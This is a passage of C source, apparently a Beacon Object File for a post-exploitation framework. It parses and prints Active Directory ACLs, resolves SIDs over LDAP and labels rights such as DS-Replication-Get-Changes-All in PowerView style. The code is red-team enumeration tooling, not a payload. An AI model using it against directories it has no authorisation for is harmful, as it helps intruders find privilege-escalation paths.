    if (MSVCRT$strstr(buffer, "readcontrol")) {
        mask |= READ_CONTROL;
    }
    if (MSVCRT$strstr(buffer, "createchild")) {
        mask |= ADS_RIGHT_DS_CREATE_CHILD;
    }
    if (MSVCRT$strstr(buffer, "deletechild")) {
        mask |= ADS_RIGHT_DS_DELETE_CHILD;
    }
    if (MSVCRT$strstr(buffer, "readprop")) {
        mask |= ADS_RIGHT_DS_READ_PROP;
    }
    if (MSVCRT$strstr(buffer, "writeprop")) {
        mask |= ADS_RIGHT_DS_WRITE_PROP;
    }
    if (MSVCRT$strstr(buffer, "extendedright")) {
        mask |= ADS_RIGHT_DS_CONTROL_ACCESS;
    }
    if (MSVCRT$strstr(buffer, "controlaccess")) {
        mask |= ADS_RIGHT_DS_CONTROL_ACCESS;
    }
    if (MSVCRT$strstr(buffer, "self")) {
        mask |= ADS_RIGHT_DS_SELF;
    }
    if (MSVCRT$strstr(buffer, "deletetree")) {
        mask |= ADS_RIGHT_DS_DELETE_TREE;
    }
    if (MSVCRT$strstr(buffer, "listobject")) {
        mask |= ADS_RIGHT_DS_LIST_OBJECT;
    }

    return mask;
}

// Parse ACE type string into ACE type byte
// Supports: allow, deny, audit
BYTE ParseAceType(const char* typeStr) {
    if (!typeStr || MSVCRT$strlen(typeStr) == 0) {
        return ACCESS_ALLOWED_ACE_TYPE; // Default to allow
    }

    // Convert to lowercase
    char buffer[32];
    MSVCRT$strncpy(buffer, typeStr, sizeof(buffer) - 1);
    buffer[sizeof(buffer) - 1] = '\0';

    char* p = buffer;
    while (*p) {
        if (*p >= 'A' && *p <= 'Z') {
            *p = *p + ('a' - 'A');
        }
        p++;
    }

    // Match type
    if (MSVCRT$strstr(buffer, "deny")) {
        return ACCESS_DENIED_ACE_TYPE;
    } else if (MSVCRT$strstr(buffer, "audit")) {
        return SYSTEM_AUDIT_ACE_TYPE;
    } else {
        return ACCESS_ALLOWED_ACE_TYPE; // Default
    }
}

// Parse ACE flags string into ACE flags byte
// Supports: OI (object inherit), CI (container inherit), NP (no propagate), IO (inherit only)
BYTE ParseAceFlags(const char* flagsStr) {
    if (!flagsStr || MSVCRT$strlen(flagsStr) == 0) {
        return 0; // No inheritance flags
    }

    BYTE flags = 0;

    // Convert to uppercase for easier matching
    char buffer[256];
    MSVCRT$strncpy(buffer, flagsStr, sizeof(buffer) - 1);
    buffer[sizeof(buffer) - 1] = '\0';

    char* p = buffer;
    while (*p) {
        if (*p >= 'a' && *p <= 'z') {
            *p = *p - ('a' - 'A');
        }
        p++;
    }

    // Check for flag abbreviations
    if (MSVCRT$strstr(buffer, "OI")) {
        flags |= OBJECT_INHERIT_ACE;
    }
    if (MSVCRT$strstr(buffer, "CI")) {
        flags |= CONTAINER_INHERIT_ACE;
    }
    if (MSVCRT$strstr(buffer, "NP")) {
        flags |= NO_PROPAGATE_INHERIT_ACE;
    }
    if (MSVCRT$strstr(buffer, "IO")) {
        flags |= INHERIT_ONLY_ACE;
    }

    // Also check for full names
    if (MSVCRT$strstr(buffer, "OBJECT_INHERIT")) {
        flags |= OBJECT_INHERIT_ACE;
    }
    if (MSVCRT$strstr(buffer, "CONTAINER_INHERIT")) {
        flags |= CONTAINER_INHERIT_ACE;
    }
    if (MSVCRT$strstr(buffer, "NO_PROPAGATE")) {
        flags |= NO_PROPAGATE_INHERIT_ACE;
    }
    if (MSVCRT$strstr(buffer, "INHERIT_ONLY")) {
        flags |= INHERIT_ONLY_ACE;
    }

    return flags;
}

// Parse an ACE into structured format
BOOL ParseAce(PACE_HEADER aceHeader, PPARSED_ACE_INFO parsedAce) {
    if (!aceHeader || !parsedAce) return FALSE;

    parsedAce->AceType = aceHeader->AceType;
    parsedAce->AceFlags = aceHeader->AceFlags;

    // Determine if this is an object ACE (has GUIDs)
    parsedAce->IsObjectAce = (aceHeader->AceType == ACCESS_ALLOWED_OBJECT_ACE_TYPE ||
                              aceHeader->AceType == ACCESS_DENIED_OBJECT_ACE_TYPE ||
                              aceHeader->AceType == SYSTEM_AUDIT_OBJECT_ACE_TYPE);

    if (parsedAce->IsObjectAce) {
        // Object ACE - has GUIDs
        PACCESS_ALLOWED_OBJECT_ACE pObjectAce = (PACCESS_ALLOWED_OBJECT_ACE)aceHeader;
        parsedAce->Mask = pObjectAce->Mask;

        parsedAce->HasObjectType = (pObjectAce->Flags & ACE_OBJECT_TYPE_PRESENT) != 0;
        parsedAce->HasInheritedObjectType = (pObjectAce->Flags & ACE_INHERITED_OBJECT_TYPE_PRESENT) != 0;

        if (parsedAce->HasObjectType) {
            MSVCRT$memcpy(&parsedAce->ObjectType, &pObjectAce->ObjectType, sizeof(GUID));
        }

        if (parsedAce->HasInheritedObjectType) {
            MSVCRT$memcpy(&parsedAce->InheritedObjectType, &pObjectAce->InheritedObjectType, sizeof(GUID));
        }

        // Get SID (it's after the GUIDs in the structure)
        PSID pSid = GetSidFromAce(aceHeader);
        if (pSid) {
            LPSTR sidStr = NULL;
            if (ADVAPI32$ConvertSidToStringSidA(pSid, &sidStr)) {
                size_t len = MSVCRT$strlen(sidStr) + 1;
                parsedAce->TrusteeSid = (char*)MSVCRT$malloc(len);
                if (parsedAce->TrusteeSid) {
                    MSVCRT$strcpy(parsedAce->TrusteeSid, sidStr);
                }
                KERNEL32$LocalFree(sidStr);
            }
        }
    } else {
        // Standard ACE
        PACCESS_ALLOWED_ACE pAce = (PACCESS_ALLOWED_ACE)aceHeader;
        parsedAce->Mask = pAce->Mask;

        // SID starts at SidStart offset
        PSID pSid = (PSID)&pAce->SidStart;
        LPSTR sidStr = NULL;
        if (ADVAPI32$ConvertSidToStringSidA(pSid, &sidStr)) {
            size_t len = MSVCRT$strlen(sidStr) + 1;
            parsedAce->TrusteeSid = (char*)MSVCRT$malloc(len);
            if (parsedAce->TrusteeSid) {
                MSVCRT$strcpy(parsedAce->TrusteeSid, sidStr);
            }
            KERNEL32$LocalFree(sidStr);
        }
    }

    return TRUE;
}

// Get SID from ACE (handles both standard and object ACEs)
PSID GetSidFromAce(PACE_HEADER aceHeader) {
    if (!aceHeader) return NULL;

    if (aceHeader->AceType == ACCESS_ALLOWED_OBJECT_ACE_TYPE ||
        aceHeader->AceType == ACCESS_DENIED_OBJECT_ACE_TYPE ||
        aceHeader->AceType == SYSTEM_AUDIT_OBJECT_ACE_TYPE) {
        // Object ACE - SID position depends on which GUIDs are present
        // Structure: ACE_HEADER + ACCESS_MASK + Flags + [ObjectType GUID] + [InheritedObjectType GUID] + SID

        // Start after ACE_HEADER (8 bytes) + ACCESS_MASK (4 bytes) + Flags (4 bytes) = 16 bytes
        BYTE* pSidLocation = (BYTE*)aceHeader + sizeof(ACE_HEADER) + sizeof(ACCESS_MASK) + sizeof(DWORD);

        // Get the flags to determine which GUIDs are present
        DWORD* pFlags = (DWORD*)((BYTE*)aceHeader + sizeof(ACE_HEADER) + sizeof(ACCESS_MASK));
        DWORD flags = *pFlags;

        // Account for ObjectType GUID if present
        if (flags & ACE_OBJECT_TYPE_PRESENT) {
            pSidLocation += sizeof(GUID);
        }

        // Account for InheritedObjectType GUID if present
        if (flags & ACE_INHERITED_OBJECT_TYPE_PRESENT) {
            pSidLocation += sizeof(GUID);
        }

        return (PSID)pSidLocation;
    } else {
        // Standard ACE
        PACCESS_ALLOWED_ACE pAce = (PACCESS_ALLOWED_ACE)aceHeader;
        return (PSID)&pAce->SidStart;
    }
}

// Get human-readable ACE type string
char* GetAceTypeString(BYTE aceType) {
    switch (aceType) {
        case ACCESS_ALLOWED_ACE_TYPE: return "Allow";
        case ACCESS_DENIED_ACE_TYPE: return "Deny";
        case SYSTEM_AUDIT_ACE_TYPE: return "Audit";
        case SYSTEM_ALARM_ACE_TYPE: return "Alarm";
        case ACCESS_ALLOWED_OBJECT_ACE_TYPE: return "AllowObject";
        case ACCESS_DENIED_OBJECT_ACE_TYPE: return "DenyObject";
        case SYSTEM_AUDIT_OBJECT_ACE_TYPE: return "AuditObject";
        default: return "Unknown";
    }
}

// Get human-readable ACE flags string (PowerView format)
char* GetAceFlagsString(BYTE aceFlags) {
    static char flagsBuffer[256];
    flagsBuffer[0] = '\0';

    if (aceFlags == 0) {
        return "None";
    }

    BOOL first = TRUE;

    if (aceFlags & OBJECT_INHERIT_ACE) {
        MSVCRT$strcat(flagsBuffer, "OBJECT_INHERIT_ACE");
        first = FALSE;
    }
    if (aceFlags & CONTAINER_INHERIT_ACE) {
        if (!first) MSVCRT$strcat(flagsBuffer, ", ");
        MSVCRT$strcat(flagsBuffer, "CONTAINER_INHERIT_ACE");
        first = FALSE;
    }
    if (aceFlags & NO_PROPAGATE_INHERIT_ACE) {
        if (!first) MSVCRT$strcat(flagsBuffer, ", ");
        MSVCRT$strcat(flagsBuffer, "NO_PROPAGATE_INHERIT_ACE");
        first = FALSE;
    }
    if (aceFlags & INHERIT_ONLY_ACE) {
        if (!first) MSVCRT$strcat(flagsBuffer, ", ");
        MSVCRT$strcat(flagsBuffer, "INHERIT_ONLY_ACE");
        first = FALSE;
    }
    if (aceFlags & INHERITED_ACE) {
        if (!first) MSVCRT$strcat(flagsBuffer, ", ");
        MSVCRT$strcat(flagsBuffer, "INHERITED_ACE");
        first = FALSE;
    }

    return flagsBuffer;
}

// Get inheritance type string based on ACE flags
char* GetInheritanceTypeString(BYTE aceFlags) {
    // Extract only the inheritance-related flags (not INHERITED_ACE)
    BYTE inheritFlags = aceFlags & (OBJECT_INHERIT_ACE | CONTAINER_INHERIT_ACE |
                                     NO_PROPAGATE_INHERIT_ACE | INHERIT_ONLY_ACE);

    // Map flag combinations to PowerView inheritance types
    if (inheritFlags == 0) {
        return "None";
    }

    // All = OI + CI (inherits to all descendants)
    if ((inheritFlags & (OBJECT_INHERIT_ACE | CONTAINER_INHERIT_ACE)) ==
        (OBJECT_INHERIT_ACE | CONTAINER_INHERIT_ACE) &&
        !(inheritFlags & NO_PROPAGATE_INHERIT_ACE) &&
        !(inheritFlags & INHERIT_ONLY_ACE)) {
        return "All";
    }

    // Children = OI + CI + NP (one level only)
    if ((inheritFlags & (OBJECT_INHERIT_ACE | CONTAINER_INHERIT_ACE | NO_PROPAGATE_INHERIT_ACE)) ==
        (OBJECT_INHERIT_ACE | CONTAINER_INHERIT_ACE | NO_PROPAGATE_INHERIT_ACE) &&
        !(inheritFlags & INHERIT_ONLY_ACE)) {
        return "Children";
    }

    // Descendents = OI + CI + IO (inherits to children but not this object)
    if ((inheritFlags & (OBJECT_INHERIT_ACE | CONTAINER_INHERIT_ACE | INHERIT_ONLY_ACE)) ==
        (OBJECT_INHERIT_ACE | CONTAINER_INHERIT_ACE | INHERIT_ONLY_ACE) &&
        !(inheritFlags & NO_PROPAGATE_INHERIT_ACE)) {
        return "Descendents";
    }

    // SelfAndChildren = OI + CI + NP + IO (not common, but possible)
    if ((inheritFlags & (OBJECT_INHERIT_ACE | CONTAINER_INHERIT_ACE | NO_PROPAGATE_INHERIT_ACE | INHERIT_ONLY_ACE)) ==
        (OBJECT_INHERIT_ACE | CONTAINER_INHERIT_ACE | NO_PROPAGATE_INHERIT_ACE | INHERIT_ONLY_ACE)) {
        return "SelfAndChildren";
    }

    // Containers = CI only (no IO, no NP)
    if (inheritFlags == CONTAINER_INHERIT_ACE) {
        return "Containers";
    }

    // CI + IO = inherit to container descendants only, not this object
    if ((inheritFlags & (CONTAINER_INHERIT_ACE | INHERIT_ONLY_ACE)) ==
        (CONTAINER_INHERIT_ACE | INHERIT_ONLY_ACE) &&
        !(inheritFlags & OBJECT_INHERIT_ACE) &&
        !(inheritFlags & NO_PROPAGATE_INHERIT_ACE)) {
        return "Descendents";
    }

    // CI + NP = immediate container children only
    if ((inheritFlags & (CONTAINER_INHERIT_ACE | NO_PROPAGATE_INHERIT_ACE)) ==
        (CONTAINER_INHERIT_ACE | NO_PROPAGATE_INHERIT_ACE) &&
        !(inheritFlags & OBJECT_INHERIT_ACE) &&
        !(inheritFlags & INHERIT_ONLY_ACE)) {
        return "Children";
    }

    // Objects = OI only
    if (inheritFlags == OBJECT_INHERIT_ACE) {
        return "Objects";
    }

    // OI + IO = inherit to object descendants only, not this object
    if ((inheritFlags & (OBJECT_INHERIT_ACE | INHERIT_ONLY_ACE)) ==
        (OBJECT_INHERIT_ACE | INHERIT_ONLY_ACE) &&
        !(inheritFlags & CONTAINER_INHERIT_ACE) &&
        !(inheritFlags & NO_PROPAGATE_INHERIT_ACE)) {
        return "Descendents";
    }

    // OI + NP = immediate object children only
    if ((inheritFlags & (OBJECT_INHERIT_ACE | NO_PROPAGATE_INHERIT_ACE)) ==
        (OBJECT_INHERIT_ACE | NO_PROPAGATE_INHERIT_ACE) &&
        !(inheritFlags & CONTAINER_INHERIT_ACE) &&
        !(inheritFlags & INHERIT_ONLY_ACE)) {
        return "Children";
    }

    // Default for other combinations
    return "None";
}

// Get human-readable access mask string
char* GetAccessMaskString(ACCESS_MASK mask) {
    static char maskBuffer[512];
    maskBuffer[0] = '\0';

    if (mask == 0) {
        return "None";
    }

    BOOL first = TRUE;

    // Check for generic rights first
    if (mask & GENERIC_ALL) {
        MSVCRT$strcat(maskBuffer, "GenericAll");
        first = FALSE;
    }
    if (mask & GENERIC_WRITE) {
        if (!first) MSVCRT$strcat(maskBuffer, ",");
        MSVCRT$strcat(maskBuffer, "GenericWrite");
        first = FALSE;
    }
    if (mask & GENERIC_READ) {
        if (!first) MSVCRT$strcat(maskBuffer, ",");
        MSVCRT$strcat(maskBuffer, "GenericRead");
        first = FALSE;
    }
    if (mask & GENERIC_EXECUTE) {
        if (!first) MSVCRT$strcat(maskBuffer, ",");
        MSVCRT$strcat(maskBuffer, "GenericExecute");
        first = FALSE;
    }

    // Standard rights
    if (mask & DELETE_ACCESS) {
        if (!first) MSVCRT$strcat(maskBuffer, ",");
        MSVCRT$strcat(maskBuffer, "Delete");
        first = FALSE;
    }
    if (mask & WRITE_DACL) {
        if (!first) MSVCRT$strcat(maskBuffer, ",");
        MSVCRT$strcat(maskBuffer, "WriteDacl");
        first = FALSE;
    }
    if (mask & WRITE_OWNER) {
        if (!first) MSVCRT$strcat(maskBuffer, ",");
        MSVCRT$strcat(maskBuffer, "WriteOwner");
        first = FALSE;
    }
    if (mask & READ_CONTROL) {
        if (!first) MSVCRT$strcat(maskBuffer, ",");
        MSVCRT$strcat(maskBuffer, "ReadControl");
        first = FALSE;
    }

    // DS-specific rights
    if (mask & ADS_RIGHT_DS_CREATE_CHILD) {
        if (!first) MSVCRT$strcat(maskBuffer, ",");
        MSVCRT$strcat(maskBuffer, "CreateChild");
        first = FALSE;
    }
    if (mask & ADS_RIGHT_DS_DELETE_CHILD) {
        if (!first) MSVCRT$strcat(maskBuffer, ",");
        MSVCRT$strcat(maskBuffer, "DeleteChild");
        first = FALSE;
    }
    if (mask & ADS_RIGHT_DS_READ_PROP) {
        if (!first) MSVCRT$strcat(maskBuffer, ",");
        MSVCRT$strcat(maskBuffer, "ReadProperty");
        first = FALSE;
    }
    if (mask & ADS_RIGHT_DS_WRITE_PROP) {
        if (!first) MSVCRT$strcat(maskBuffer, ",");
        MSVCRT$strcat(maskBuffer, "WriteProperty");
        first = FALSE;
    }
    if (mask & ADS_RIGHT_DS_CONTROL_ACCESS) {
        if (!first) MSVCRT$strcat(maskBuffer, ",");
        MSVCRT$strcat(maskBuffer, "ExtendedRight");
        first = FALSE;
    }

    // If buffer is still empty, show raw hex
    if (maskBuffer[0] == '\0') {
        MSVCRT$_snprintf(maskBuffer, sizeof(maskBuffer), "0x%08x", mask);
    }

    return maskBuffer;
}

// ============================================================================
// SID UTILITIES
// ============================================================================

// Convert SID to string
char* SidToString(PSID sid) {
    if (!sid) return NULL;

    LPSTR sidStr = NULL;
    if (!ADVAPI32$ConvertSidToStringSidA(sid, &sidStr)) {
        return NULL;
    }

    // Copy to our own buffer
    size_t len = MSVCRT$strlen(sidStr) + 1;
    char* result = (char*)MSVCRT$malloc(len);
    if (result) {
        MSVCRT$strcpy(result, sidStr);
    }

    KERNEL32$LocalFree(sidStr);
    return result;
}

// Convert string to SID
PSID StringToSid(const char* sidString) {
    if (!sidString) return NULL;

    PSID pSid = NULL;
    if (!ADVAPI32$ConvertStringSidToSidA(sidString, &pSid)) {
        return NULL;
    }

    return pSid;
}

// Resolve SID to name via LDAP (searches for objectSid attribute)
char* ResolveSidToName(LDAP* ld, const char* sidString, const char* defaultNC) {
    if (!ld || !sidString || !defaultNC) return NULL;

    // Convert SID string to binary SID
    PSID pSid = StringToSid(sidString);
    if (!pSid) return NULL;

    // Get the SID length
    DWORD sidLen = ADVAPI32$GetLengthSid(pSid);
    if (sidLen == 0) {
        KERNEL32$LocalFree(pSid);
        return NULL;
    }

    // Build LDAP filter with escaped binary SID
    // Format: (objectSid=\xx\xx\xx...) where xx is hex byte
    char filter[512];
    int filterPos = 0;

    // Start filter
    filterPos += MSVCRT$_snprintf(filter + filterPos, sizeof(filter) - filterPos, "(objectSid=");

    // Add escaped binary bytes
    BYTE* sidBytes = (BYTE*)pSid;
    for (DWORD i = 0; i < sidLen && filterPos < sizeof(filter) - 4; i++) {
        filterPos += MSVCRT$_snprintf(filter + filterPos, sizeof(filter) - filterPos, "\\%02x", sidBytes[i]);
    }

    // Close filter
    filterPos += MSVCRT$_snprintf(filter + filterPos, sizeof(filter) - filterPos, ")");

    // Free the SID
    KERNEL32$LocalFree(pSid);

    char* attrs[] = { "sAMAccountName", "name", "cn", NULL };
    LDAPMessage* searchResult = NULL;
    LDAPMessage* entry = NULL;
    char** values = NULL;
    char* name = NULL;

    // Try searching in the default NC first
    ULONG result = WLDAP32$ldap_search_s(
        ld,
        (char*)defaultNC,
        LDAP_SCOPE_SUBTREE,
        filter,
        attrs,
        0,
        &searchResult
    );

    if (result == LDAP_SUCCESS) {
        entry = WLDAP32$ldap_first_entry(ld, searchResult);
        if (entry) {
            // Try sAMAccountName first
            values = WLDAP32$ldap_get_values(ld, entry, "sAMAccountName");
            if (!values || !values[0]) {
                // Fall back to cn attribute
                if (values) WLDAP32$ldap_value_free(values);
                values = WLDAP32$ldap_get_values(ld, entry, "cn");
            }
            if (!values || !values[0]) {
                // Fall back to name attribute
                if (values) WLDAP32$ldap_value_free(values);
                values = WLDAP32$ldap_get_values(ld, entry, "name");
            }

            if (values && values[0]) {
                size_t len = MSVCRT$strlen(values[0]) + 1;
                name = (char*)MSVCRT$malloc(len);
                if (name) {
                    MSVCRT$strcpy(name, values[0]);
                }
                WLDAP32$ldap_value_free(values);
            }
        }
        WLDAP32$ldap_msgfree(searchResult);
    }

    // If not found in default NC, try searching from root (for cross-domain SIDs like Enterprise Admins)
    if (!name) {
        // Extract forest root from default NC
        // E.g., DC=child,DC=parent,DC=local -> DC=parent,DC=local
        char* forestRoot = NULL;
        const char* firstComma = MSVCRT$strstr(defaultNC, ",");
        if (firstComma) {
            const char* secondComma = MSVCRT$strstr(firstComma + 1, ",");
            if (secondComma) {
                // We're in a child domain, try searching from parent
                forestRoot = (char*)(firstComma + 1);
            }
        }

        // If we found a potential forest root, search there
        if (forestRoot) {
            result = WLDAP32$ldap_search_s(
                ld,
                forestRoot,
                LDAP_SCOPE_SUBTREE,
                filter,
                attrs,
                0,
                &searchResult
            );

            if (result == LDAP_SUCCESS) {
                entry = WLDAP32$ldap_first_entry(ld, searchResult);
                if (entry) {
                    // Try sAMAccountName first
                    values = WLDAP32$ldap_get_values(ld, entry, "sAMAccountName");
                    if (!values || !values[0]) {
                        // Fall back to cn attribute
                        if (values) WLDAP32$ldap_value_free(values);
                        values = WLDAP32$ldap_get_values(ld, entry, "cn");
                    }
                    if (!values || !values[0]) {
                        // Fall back to name attribute
                        if (values) WLDAP32$ldap_value_free(values);
                        values = WLDAP32$ldap_get_values(ld, entry, "name");
                    }

                    if (values && values[0]) {
                        size_t len = MSVCRT$strlen(values[0]) + 1;
                        name = (char*)MSVCRT$malloc(len);
                        if (name) {
                            MSVCRT$strcpy(name, values[0]);
                        }
                        WLDAP32$ldap_value_free(values);
                    }
                }
                WLDAP32$ldap_msgfree(searchResult);
            }
        }
    }

    return name;
}

// Get objectSid from an LDAP object
PSID GetObjectSid(LDAP* ld, const char* objectDN) {
    if (!ld || !objectDN) return NULL;

    LDAPMessage* searchResult = NULL;
    LDAPMessage* entry = NULL;
    char* attrs[] = { "objectSid", NULL };
    struct berval** values = NULL;
    PSID pSid = NULL;

    // Search for the object with objectSid attribute
    ULONG result = WLDAP32$ldap_search_s(
        ld,
        (char*)objectDN,
        LDAP_SCOPE_BASE,
        "(objectClass=*)",
        attrs,
        0,
        &searchResult
    );

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to search for object");
        PrintLdapError("Search for objectSid", result);
        return NULL;
    }

    entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (!entry) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Object not found");
        WLDAP32$ldap_msgfree(searchResult);
        return NULL;
    }

    // Get the binary objectSid value
    values = WLDAP32$ldap_get_values_len(ld, entry, "objectSid");
    if (!values || !values[0]) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to retrieve objectSid attribute");
        WLDAP32$ldap_msgfree(searchResult);
        return NULL;
    }

    // Allocate and copy the SID
    DWORD sidLength = values[0]->bv_len;
    pSid = (PSID)MSVCRT$malloc(sidLength);
    if (pSid) {
        MSVCRT$memcpy(pSid, values[0]->bv_val, sidLength);
    }

    WLDAP32$ldap_value_free_len(values);
    WLDAP32$ldap_msgfree(searchResult);

    return pSid;
}

// ============================================================================
// GUID UTILITIES
// ============================================================================

// Convert GUID string to GUID structure
BOOL StringToGuid(const char* guidString, GUID* guid) {
    if (!guidString || !guid) return FALSE;
    
    RPC_STATUS status = RPCRT4$UuidFromStringA((RPC_CSTR)guidString, guid);
    return (status == RPC_S_OK);
}

// Convert GUID structure to string
char* GuidToString(GUID* guid) {
    if (!guid) return NULL;
    
    RPC_CSTR guidStr = NULL;
    if (RPCRT4$UuidToStringA(guid, &guidStr) != RPC_S_OK) {
        return NULL;
    }
    
    // Copy to our own buffer
    size_t len = MSVCRT$strlen((char*)guidStr) + 1;
    char* result = (char*)MSVCRT$malloc(len);
    if (result) {
        MSVCRT$strcpy(result, (char*)guidStr);
    }
    
    // Free RPC string (using RpcStringFree would be proper, but LocalFree works)
    KERNEL32$LocalFree(guidStr);
    
    return result;
}

// Get friendly name for well-known GUIDs
// Always returns an allocated string that must be freed by the caller
char* GetGuidFriendlyName(GUID* guid) {
    if (!guid) return NULL;
    
    char* guidStr = GuidToString(guid);
    if (!guidStr) return NULL;
    
    // Check for well-known extended rights GUIDs
    if (MSVCRT$strcmp(guidStr, "00299570-246d-11d0-a768-00aa006e0529") == 0) {
        MSVCRT$free(guidStr);
        char* name = (char*)MSVCRT$malloc(28);
        if (name) MSVCRT$strcpy(name, "User-Force-Change-Password");
        return name;
    }
    else if (MSVCRT$strcmp(guidStr, "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2") == 0) {
        MSVCRT$free(guidStr);
        char* name = (char*)MSVCRT$malloc(29);
        if (name) MSVCRT$strcpy(name, "DS-Replication-Get-Changes");
        return name;
    }
    else if (MSVCRT$strcmp(guidStr, "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2") == 0) {
        MSVCRT$free(guidStr);
        char* name = (char*)MSVCRT$malloc(33);
        if (name) MSVCRT$strcpy(name, "DS-Replication-Get-Changes-All");
        return name;
    }
    else if (MSVCRT$strcmp(guidStr, "89e95b76-444d-4c62-991a-0facbeda640c") == 0) {
        MSVCRT$free(guidStr);
        char* name = (char*)MSVCRT$malloc(38);
        if (name) MSVCRT$strcpy(name, "DS-Replication-Get-Changes-Filtered");
        return name;
    }
    else if (MSVCRT$strcmp(guidStr, "91e647de-d96f-4b70-9557-d63ff4f3ccd8") == 0) {
        MSVCRT$free(guidStr);
        char* name = (char*)MSVCRT$malloc(20);
        if (name) MSVCRT$strcpy(name, "Private-Information");
        return name;
    }
    
    // Check for well-known object class GUIDs (InheritedObjectType)
    else if (MSVCRT$strcmp(guidStr, "bf967aba-0de6-11d0-a285-00aa003049e2") == 0) {
        MSVCRT$free(guidStr);
        char* name = (char*)MSVCRT$malloc(5);
        if (name) MSVCRT$strcpy(name, "User");
        return name;
    }
    else if (MSVCRT$strcmp(guidStr, "bf967a9c-0de6-11d0-a285-00aa003049e2") == 0) {
        MSVCRT$free(guidStr);
        char* name = (char*)MSVCRT$malloc(6);
        if (name) MSVCRT$strcpy(name, "Group");
        return name;
    }
    else if (MSVCRT$strcmp(guidStr, "bf967a86-0de6-11d0-a285-00aa003049e2") == 0) {
        MSVCRT$free(guidStr);
        char* name = (char*)MSVCRT$malloc(9);
        if (name) MSVCRT$strcpy(name, "Computer");
        return name;
    }
    else if (MSVCRT$strcmp(guidStr, "4828cc14-1437-45bc-9b07-ad6f015e5f28") == 0) {
        MSVCRT$free(guidStr);
        char* name = (char*)MSVCRT$malloc(14);
        if (name) MSVCRT$strcpy(name, "inetOrgPerson");
        return name;
    }
    else if (MSVCRT$strcmp(guidStr, "bf967aa5-0de6-11d0-a285-00aa003049e2") == 0) {
        MSVCRT$free(guidStr);
        char* name = (char*)MSVCRT$malloc(19);
        if (name) MSVCRT$strcpy(name, "organizationalUnit");
        return name;
    }
    else if (MSVCRT$strcmp(guidStr, "bf967aa8-0de6-11d0-a285-00aa003049e2") == 0) {
        MSVCRT$free(guidStr);
        char* name = (char*)MSVCRT$malloc(11);
        if (name) MSVCRT$strcpy(name, "printQueue");
        return name;
    }
    else if (MSVCRT$strcmp(guidStr, "bf967ab3-0de6-11d0-a285-00aa003049e2") == 0) {
        MSVCRT$free(guidStr);
        char* name = (char*)MSVCRT$malloc(7);
        if (name) MSVCRT$strcpy(name, "volume");
        return name;
    }
    else if (MSVCRT$strcmp(guidStr, "bf967a0a-0de6-11d0-a285-00aa003049e2") == 0) {
        MSVCRT$free(guidStr);
        char* name = (char*)MSVCRT$malloc(11);
        if (name) MSVCRT$strcpy(name, "domainDNS");
        return name;
    }
    else if (MSVCRT$strcmp(guidStr, "19195a5a-6da0-11d0-afd3-00c04fd930c9") == 0) {
        MSVCRT$free(guidStr);
        char* name = (char*)MSVCRT$malloc(8);
        if (name) MSVCRT$strcpy(name, "contact");
        return name;
    }
    
    // Return the GUID string itself if not recognized
    return guidStr;
}

// ============================================================================
// DISPLAY UTILITIES
// ============================================================================

// Print parsed security descriptor information
void PrintSecurityDescriptorInfo(PSD_INFO sdInfo, const char* objectDN, const char* objectSid) {
    if (!sdInfo) return;

    BeaconPrintf(CALLBACK_OUTPUT, "\n[+] Security Descriptor Information:\n=====================================");
    
    // Owner
    if (sdInfo->OwnerSid) {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Owner: %s", sdInfo->OwnerSid);
        if (sdInfo->OwnerName) {
            BeaconPrintf(CALLBACK_OUTPUT, "    Name: %s", sdInfo->OwnerName);
        }
    }
    
    // Group
    if (sdInfo->GroupSid) {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Group: %s", sdInfo->GroupSid);
        if (sdInfo->GroupName) {
            BeaconPrintf(CALLBACK_OUTPUT, "    Name: %s", sdInfo->GroupName);
        }
    }
    
    // Control flags
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Control Flags: 0x%04x", sdInfo->ControlFlags);
    if (sdInfo->ControlFlags & SE_DACL_PROTECTED) {
        BeaconPrintf(CALLBACK_OUTPUT, "    - DACL is protected (inheritance blocked)");
    }
    if (sdInfo->ControlFlags & SE_SACL_PROTECTED) {
        BeaconPrintf(CALLBACK_OUTPUT, "    - SACL is protected");
    }
    
    // DACL
    BeaconPrintf(CALLBACK_OUTPUT, "\n[*] DACL (Discretionary Access Control List):");
    if (!sdInfo->HasDacl) {
        BeaconPrintf(CALLBACK_OUTPUT, "    No DACL present (NULL DACL - everyone has full access!)");
    } else if (sdInfo->DaclAceCount == 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "    Empty DACL (no one has access)");
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "    %d ACE(s):", sdInfo->DaclAceCount);
        for (DWORD i = 0; i < sdInfo->DaclAceCount; i++) {
            PrintAceInfo(&sdInfo->DaclAces[i], i, objectDN, objectSid);
        }
    }
    
    // SACL (if present)
    if (sdInfo->HasSacl && sdInfo->SaclAceCount > 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "\n[*] SACL (System Access Control List):");
        BeaconPrintf(CALLBACK_OUTPUT, "    %d ACE(s):", sdInfo->SaclAceCount);
        for (DWORD i = 0; i < sdInfo->SaclAceCount; i++) {
            PrintAceInfo(&sdInfo->SaclAces[i], i, objectDN, objectSid);
        }
    }
    
    BeaconPrintf(CALLBACK_OUTPUT, "=====================================\n");
}

// Print individual ACE information (PowerView format)
void PrintAceInfo(PPARSED_ACE_INFO aceInfo, int index, const char* objectDN, const char* objectSid) {
    if (!aceInfo) return;

    // Print ACE number header
    BeaconPrintf(CALLBACK_OUTPUT, "\n    ACE #%d:", index);
    
    // ObjectDN
    if (objectDN) {
        BeaconPrintf(CALLBACK_OUTPUT, "      ObjectDN                : %s", objectDN);
    }
    
    // ObjectSID
    if (objectSid) {
        BeaconPrintf(CALLBACK_OUTPUT, "      ObjectSID               : %s", objectSid);
    }
    
    // ACEType
    char* aceTypeStr = GetAceTypeString(aceInfo->AceType);
    if (aceInfo->IsObjectAce) {
        if (aceInfo->AceType == ACCESS_ALLOWED_OBJECT_ACE_TYPE) {
            BeaconPrintf(CALLBACK_OUTPUT, "      ACEType                 : ACCESS_ALLOWED_OBJECT_ACE");
        } else if (aceInfo->AceType == ACCESS_DENIED_OBJECT_ACE_TYPE) {
